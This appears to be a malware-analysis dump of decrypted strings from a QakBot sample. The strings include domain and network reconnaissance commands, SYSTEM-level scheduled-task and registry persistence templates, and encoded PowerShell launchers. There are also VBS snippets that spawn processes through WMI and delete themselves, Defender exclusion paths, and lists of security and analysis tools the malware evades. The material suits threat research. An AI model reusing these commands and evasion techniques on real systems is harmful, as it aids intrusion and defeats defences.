qakbot_ttps.txt

[+] decrypted data buffer at 0x1001E0D8:

--------------------------------------------

[0] -> SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
[1] -> cmd /c set
[2] -> .lnk
[3] -> nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
[4] -> SoNuce]ugdiB3c[doMuce2s81*uXmcvP
[5] -> arp -a
[6] -> ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
[7] -> powershell.exe
[8] -> %u;%u;%u;
[9] -> route print
[10] -> error res='%s' err=%d len=%u
[11] -> Microsoft
[12] -> 89290af9
[13] -> ProfileImagePath
[14] -> nltest /domain_trusts /all_trusts
[15] -> Self check
[16] -> net localgroup
[17] -> qwinsta
[18] -> Start screenshot
[19] -> bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
[20] -> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[21] -> \System32\WindowsPowerShell\v1.0\powershell.exe
[22] -> ipconfig /all
[23] -> whoami /all
[24] -> "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
[25] -> powershell.exe -encodedCommand 
[26] -> amstream.dll
[27] -> %s \"$%s = \\\"%s\\\\; & $%s\"
[28] -> at.exe %u:%u "%s" /I
[29] -> ERROR: GetModuleFileNameW() failed with error: %u
[30] -> powershell.exe -encodedCommand %S
[31] -> schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
[32] -> schtasks.exe /Delete /F /TN %u
[33] -> 3c91e539
[34] -> %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
[35] -> netstat -nao
[36] -> /t5
[37] -> %s "$%s = \"%s\"; & $%s"
[38] -> net view
[39] ->  /c ping.exe -n 6 127.0.0.1 &  type "%s\System32\calc.exe" > "%s"
[40] -> net share
[41] -> SELF_TEST_1
[42] -> regsvr32.exe 
[43] -> Self test FAILED!!!
[44] -> cmd
[45] -> Self check ok!
[46] -> Self test OK.
[47] -> ProgramData
[48] -> runas
[49] -> c:\ProgramData
[+] decrypted data buffer at 0x1001E0D8:

--------------------------------------------

[0] -> .dat
[1] -> t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
[2] -> aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
[3] -> SystemRoot
[4] -> type=0x%04X
[5] -> SpyNetReporting
[6] ->  from 
[7] -> netapi32.dll
[8] -> SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
[9] -> egui.exe;ekrn.exe
[10] -> Initializing database...
[11] -> rundll32.exe 
[12] -> vbs
[13] -> 1234567890
[14] -> SysWOW64
[15] -> MsMpEng.exe
[16] -> .exe
[17] -> Win32_ComputerSystem
[18] -> CommandLine
[19] -> frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe
[20] -> %s\system32\
[21] -> vkise.exe;isesrv.exe;cmdagent.exe
[22] -> Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
[23] -> %SystemRoot%\System32\OneDriveSetup.exe
[24] -> application/x-shockwave-flash
[25] -> SELECT * FROM AntiVirusProduct
[26] -> %SystemRoot%\explorer.exe
[27] -> Win32_Bios
[28] -> %SystemRoot%\SysWOW64\explorer.exe
[29] -> Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
[30] -> %SystemRoot%\SysWOW64\msra.exe
[31] -> Winsta0
[32] -> setupapi.dll
[33] -> image/pjpeg
[34] -> Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'")
For Each objFile in colFiles
objFile.Copy("%s")
Next
[35] -> %SystemRoot%\System32\msra.exe
[36] -> Win32_Product
[37] -> open
[38] -> System32
[39] -> aswhooka.dll
[40] -> ntdll.dll
[41] -> TRUE
[42] -> C:\INTERNAL\__empty
[43] -> \\.\pipe\
[44] -> Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
[45] -> image/gif
[46] -> LOCALAPPDATA
[47] -> {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
[48] -> ROOT\CIMV2
[49] -> c:\\
[50] -> Content-Type: application/x-www-form-urlencoded
[51] -> %SystemRoot%\SysWOW64\dxdiag.exe
[52] -> %SystemRoot%\System32\xwizard.exe
[53] -> crypt32.dll
[54] -> FALSE
[55] -> %SystemRoot%\SysWOW64\mobsync.exe
[56] -> Name
[57] -> c:\hiberfil.sysss
[58] -> */*
[59] -> ws2_32.dll
[60] -> NTUSER.DAT
[61] -> wininet.dll
[62] -> %SystemRoot%\System32\mobsync.exe
[63] -> %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
[64] -> mcshield.exe
[65] -> abcdefghijklmnopqrstuvwxyz
[66] -> cscript.exe
[67] -> displayName
[68] -> %ProgramFiles%\Internet Explorer\iexplore.exe
[69] -> SELECT * FROM Win32_OperatingSystem
[70] -> S:(ML;;NW;;;LW)
[71] -> .cfg
[72] -> userenv.dll
[73] -> WScript.Sleep %u
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
WSCript.Sleep 2000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("%s")
[74] -> wmic process call create 'expand "%S" "%S"'

[75] -> SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
[76] -> select 
[77] -> \sf2.dll
[78] -> Win32_PhysicalMemory
[79] -> AvastSvc.exe
[80] -> SubmitSamplesConsent
[81] -> %SystemRoot%\System32\wermgr.exe
[82] -> bcrypt.dll
[83] -> reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
[84] -> ByteFence.exe
[85] -> SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
[86] -> bdagent.exe;vsserv.exe;vsservppl.exe
[87] -> %SystemRoot%\SysWOW64\explorer.exe
[88] -> mpr.dll
[89] -> avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
[90] -> dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
[91] -> fmon.exe
[92] -> LastBootUpTime
[93] -> Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
[94] -> APPDATA
[95] -> %u.%u.%u.%u.%u.%u.%04x
[96] -> root\SecurityCenter2
[97] -> shell32.dll
[98] -> image/jpeg
[99] -> .dll
[100] -> winsta0\default
[101] -> pstorec.dll
[102] -> coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
[103] -> SOFTWARE\Microsoft\Windows Defender\SpyNet
[104] -> WBJ_IGNORE
[105] -> fshoster32.exe
[106] -> SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
[107] -> wtsapi32.dll
[108] -> WRSA.exe
[109] -> wpcap.dll
[110] -> %SystemRoot%\explorer.exe
[111] -> ccSvcHst.exe
[112] -> aabcdeefghiijklmnoopqrstuuvwxyyz
[113] -> https
[114] -> iphlpapi.dll
[115] -> %SystemRoot%\SysWOW64\OneDriveSetup.exe
[116] -> urlmon.dll
[117] -> Caption
[118] -> avp.exe;kavtray.exe
[119] -> %SystemRoot%\SysWOW64\wermgr.exe
[120] -> shlwapi.dll
[121] -> snxhk_border_mywnd
[122] -> wbj.go
[123] -> Win32_PnPEntity
[124] -> Packages
[125] -> SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
[126] -> %SystemRoot%\SysWOW64\xwizard.exe
[127] -> Win32_DiskDrive
[128] -> WQL
[129] -> user32.dll
[130] -> Create
[131] -> aswhookx.dll
[132] -> SAVAdminService.exe;SavService.exe
[133] -> ALLUSERSPROFILE
[134] -> MBAMService.exe;mbamgui.exe
[135] -> LocalLow
[136] -> %S.%06d
[137] -> advapi32.dll
[138] -> kernel32.dll
[139] -> Software\Microsoft
[140] -> Win32_Process
[141] -> %SystemRoot%\System32\dxdiag.exe
[142] -> SELECT * FROM Win32_Processor
[143] -> cmd.exe